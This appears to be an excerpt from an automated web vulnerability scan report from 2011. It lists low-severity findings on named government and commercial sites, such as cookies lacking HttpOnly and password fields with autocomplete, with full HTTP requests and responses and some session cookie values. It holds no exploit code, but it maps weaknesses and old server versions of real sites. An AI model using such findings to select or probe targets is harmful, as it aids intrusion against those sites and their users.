Host: www.vitalchek.com

Response

HTTP/1.1 302 Found
Set-Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; path=/
Date: Sat, 30 Apr 2011 01:11:41 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Location: /default.aspx?aspxerrorpath=/WebResource.axd
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 169

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdefault.aspx%3faspxerrorpath%3d%2fWebResource.axd">here</a>.</h2>
</body></html>

14.653. http://www.vitalchek.com/css/Portal/VitalChek/main.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /css/Portal/VitalChek/main.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/Portal/VitalChek/main.aspx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vitalchek.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QUIPIMSvcnwpis05CKQLY; path=/
Date: Sat, 30 Apr 2011 01:11:39 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: public, max-age=57
Expires: Sat, 30 Apr 2011 01:12:36 GMT
Last-Modified: Sat, 30 Apr 2011 01:11:36 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 58668


*
{
   margin: 0px;
   padding: 0;
}
h1
{
   font-size: 1.1em;
}
h2
{
   margin-top: 1em;
   font-size: 1.1em;
}
h3
{
   font-size: 1em;
   margin-top: 1em;
   margin-bottom: .5em;
}
img
{
   bo
...[SNIP]...

14.654. http://www.vitalchek.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx?aspxerrorpath=/WebResource.axd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vitalchek.com

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; path=/
Date: Sat, 30 Apr 2011 01:11:41 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1507

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...

14.655. http://www.vitalchek.com/images/background/bg_chat.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /images/background/bg_chat.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/background/bg_chat.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vitalchek.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; path=/
Content-Length: 197422
Content-Type: image/png
Content-Location: http://www.vitalchek.com/images/background/bg_chat.png
Last-Modified: Mon, 04 Oct 2010 20:32:22 GMT
Accept-Ranges: bytes
ETag: "0cf4e3f364cb1:c6a"
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:12:46 GMT

.PNG
.
...IHDR..............<......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....IDATx^.}.|T.........l..dS6.....d.mz1.c.{...!!..z.]BB...T.;.`.....0U.^.?.|.{...q.G....7o...
...[SNIP]...

14.656. http://www.vitalchek.com/js/google_analytics_js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /js/google_analytics_js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/google_analytics_js.aspx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vitalchek.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QUIPIMSvcnwpis05CKQLY; path=/
Date: Sat, 30 Apr 2011 01:11:45 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 22769


var _gat=new Object({c:"length",lb:"4.3",m:"cookie",b:undefined,cb:function(d,a){this.zb=d;this.Nb=a},r:"__utma=",W:"__utmb=",ma:"__utmc=",Ta:"__utmk=",na:"__utmv=",oa:"__utmx=",Sa:"GASO=",X
...[SNIP]...

14.657. http://www.wor710.com/topic/play_window.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wor710.com
Path:   /topic/play_window.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/play_window.php HTTP/1.1
Host: www.wor710.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:41:44 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Vary: Accept-Encoding,U
X-Powered-By: PHP/4.2.3
Location: http://www.wor710.com/error/warning_error.php?message=An+error+has+occured+on+this+page&path=%2Findex.php&clickMessage=Return+to+Home+Page
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: BIGipServerRadio_Pool=2467317827.20480.0000; path=/
Content-Length: 5996


   <html>
<head>
<title>
- WOR News Talk Radio 710 HD</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <meta name="keywords" content="wor , joan , hamburg , john , ga
...[SNIP]...

14.658. http://www.wycokck.org/dept.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wycokck.org
Path:   /dept.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dept.aspx HTTP/1.1
Host: www.wycokck.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EktGUID=4db25b4d-218e-46a2-802a-6fab14bb64e4; expires=Mon, 30-Apr-2012 12:41:47 GMT; path=/
Set-Cookie: EkAnalytics=0; expires=Mon, 30-Apr-2012 12:41:47 GMT; path=/
Set-Cookie: ASP.NET_SessionId=pza4wgurbmywyhvqhshjm445; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.wycokck.org&SiteLanguage=1033&dvcMdl=Generic; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12992


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script id="EktronR
...[SNIP]...

15. Password field with autocomplete enabled  previous  next
There are 58 instances of this issue:


15.1. https://apps.tn.gov/biztax-app/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://apps.tn.gov
Path:   /biztax-app/login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /biztax-app/login.html HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/biztax/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:03:25 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2889
Set-Cookie: JSESSIONID=5917367B2BC078AE01FCE9F4DDCB78BA.portalprod1; Path=/biztax-app
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!-- InstanceBegin templa
...[SNIP]...
</h1>

<form id="login" action="/biztax-app/login.html;jsessionid=5917367B2BC078AE01FCE9F4DDCB78BA.portalprod1" method="post">    
<fieldset>
...[SNIP]...
</label> <input id="password" name="password" type="password" value="" maxlength="20"/> <br />
...[SNIP]...

15.2. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs02
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Sat, 30 Apr 2011 12:19:17 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
X-frame-options: SAMEORIGIN
Content-Length: 12472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>

<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

15.3. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs02
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Sat, 30 Apr 2011 12:19:17 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
X-frame-options: SAMEORIGIN
Content-Length: 12472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>

<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

15.4. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Sun, 01-May-2011 12:20:09 GMT; path=/; domain=digg.com
Set-Cookie: d=812aa8e869f0d2e7c87704b3fa38f3583a3547de3e2f6866581f174175564be4; expires=Thu, 29-Apr-2021 22:27:49 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24701 10.2.129.157
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

15.5. https://dotax.ehawaii.gov/efile/user  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://dotax.ehawaii.gov
Path:   /efile/user

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /efile/user HTTP/1.1
Host: dotax.ehawaii.gov
Connection: keep-alive
Referer: https://www.ehawaii.gov/efile/
Cache-Control: max-age=0
Origin: https://www.ehawaii.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral
Content-Length: 78

SESSION_ID=&CURRSTATE=com.hic.dotax.user.gui.Login&SSN=&PASSWORD=&SUBMIT=Login

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=4969BAED74BE5E78E258F5BA163F8473.lono; Path=/efile
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 7156

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<body>
<form method = post action = "/efile/user ">
<input name="SESSION_ID" type=hidden value="">
...[SNIP]...
<td><input type="password" name="PASSWORD" value="" size="14" maxlength="12" title="Password, case sensitive."></td>
...[SNIP]...

15.6. https://mibid.bidcorp.com/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mibid.bidcorp.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /Login.aspx HTTP/1.1
Host: mibid.bidcorp.com
Connection: keep-alive
Referer: https://mibid.bidcorp.com/Login.aspx
Cache-Control: max-age=0
Origin: https://mibid.bidcorp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2076

__LASTFOCUS=&__EVENTTARGET=ctl00%24LoginStatus1%24ctl02&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIwNjUyNTAwOQ9kFgJmD2QWAgIDD2QWAgIBDzwrAA0CAA8WAh4LXyFEYXRhQm91bmRnZAwUKwACBQMwOjAUKwACFg4eBFRleHQFBEhvb
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 01:31:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /login.aspx?ReturnUrl=%2fLogin.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20321

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2flogin.aspx%3fReturnUrl%3d%252fLogin.aspx">here</a>.</h2>
</body></html>


<!DOCTYPE html PUBLIC "-//W3C//DTD X
...[SNIP]...
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<form name="aspnetForm" method="post" action="Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$ContentPlaceHolder1$Login1$Password" type="password" id="ctl00_ContentPlaceHolder1_Login1_Password" style="color:#05233B;font-size:13px;width:180px;" /><span id="ctl00_ContentPlaceHolder1_Login1_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.7. https://mibid.bidcorp.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mibid.bidcorp.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?ReturnUrl=%2fLogin.aspx HTTP/1.1
Host: mibid.bidcorp.com
Connection: keep-alive
Referer: https://mibid.bidcorp.com/Login.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:39:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<form name="aspnetForm" method="post" action="login.aspx?ReturnUrl=%2fLogin.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$ContentPlaceHolder1$Login1$Password" type="password" id="ctl00_ContentPlaceHolder1_Login1_Password" style="color:#05233B;font-size:13px;width:180px;" /><span id="ctl00_ContentPlaceHolder1_Login1_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.8. https://myalaska.state.ak.us/home/app  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://myalaska.state.ak.us
Path:   /home/app

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /home/app?service=external/launch&pubid=opc HTTP/1.1
Host: myalaska.state.ak.us
Connection: keep-alive
Referer: https://myalaska.state.ak.us/home/app
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:10:40 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 14:00:00 AKST
Set-Cookie: JSESSIONID=504573A026BB83CC1E30CCDAE8301E13; Path=/home; Secure
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 19943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- Application: myalaskabarebones -->
<!-- Page: launch -->
<!-- Generated: Sat Apr 30 14:10:40
...[SNIP]...
</div>
<form method="post" name="Form0" action="/home/app;jsessionid=504573A026BB83CC1E30CCDAE8301E13">
<input type="hidden" name="service" value="direct/1/launch/$Form$1"/>
...[SNIP]...
<td align="left">
<input type="password" name="passwordField" tabindex="5" class="narrowtextwidth" maxlength="20" size="12"/>    <small>
...[SNIP]...
<td align="left">    <input type="password" name="passwordChkField" tabindex="6" class="narrowtextwidth" maxlength="20" size="12"/>    </td>
...[SNIP]...

15.9. https://myalaska.state.ak.us/login/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://myalaska.state.ak.us
Path:   /login/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/login.aspx HTTP/1.1
Host: myalaska.state.ak.us
Connection: keep-alive
Referer: https://myalaska.state.ak.us/home/app
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 8348
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>M
...[SNIP]...
<div style="clear:left;">
<form id="frmLogin" method="post" action="https://palm.state.ak.us/amserver/UI/Login">
<input type="hidden" name="goto" value="https://myalaska.state.ak.us/home/app" />
...[SNIP]...
<td><input type="password" name="Login.Token2" id="Login.Token2" maxlength="128" tabindex="2" size="15" /></td>
...[SNIP]...

15.10. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://myflorida.custhelp.com
Path:   /cgi-bin/myflorida.cfg/php/enduser/acct_login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cgi-bin/myflorida.cfg/php/enduser/acct_login.php?p_sid=ql-ywKsk&p_accessibility=0&p_redirect=&p_sp=cF9zcmNoPTEmcF9zb3J0X2J5PSZwX2dyaWRzb3J0PSZwX3Jvd19jbnQ9MCwwJnBfcHJvZHM9JnBfY2F0cz0mcF9wdj0mcF9jdj0mcF9wYWdlPTEmcF9zZWFyY2hfdGV4dD14c3M!&p_srch=1&p_next_page=std_alp.php HTTP/1.1
Host: myflorida.custhelp.com
Proxy-Connection: keep-alive
Referer: http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/std_alp.php?p_lva=&p_li=&p_accessibility=&p_redirect=&p_page=1&p_cv=&p_pv=&p_prods=&p_cats=&p_hidden_prods=&cat_lvl1=0&prod_lvl2=0&prod_lvl1=0&p_search_text=xss&x=25&y=12&p_new_search=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:09 GMT
Server: Apache
P3P: policyref="http://myflorida.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=141245 t=1304125329844119
RNT-Machine: 05
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18271

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...
</tr>
<form class="minimal" name="_validate" method="post" action="acct_login_submit.php">
<input type="hidden" name="p_sid" value="ql-ywKsk" />
...[SNIP]...
<td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td>
...[SNIP]...

15.11. https://nhlicenses.nh.gov/MyLicense%20Enterprise/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://nhlicenses.nh.gov
Path:   /MyLicense%20Enterprise/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /MyLicense%20Enterprise/ HTTP/1.1
Host: nhlicenses.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0oojxnnvs3qut4rouxmi2bnj

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 6524
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <link rel="stylesheet" href="stylesheets/elicense2000.css">
       <META HTTP-EQUIV="Expires" CONTENT="0">
       <META
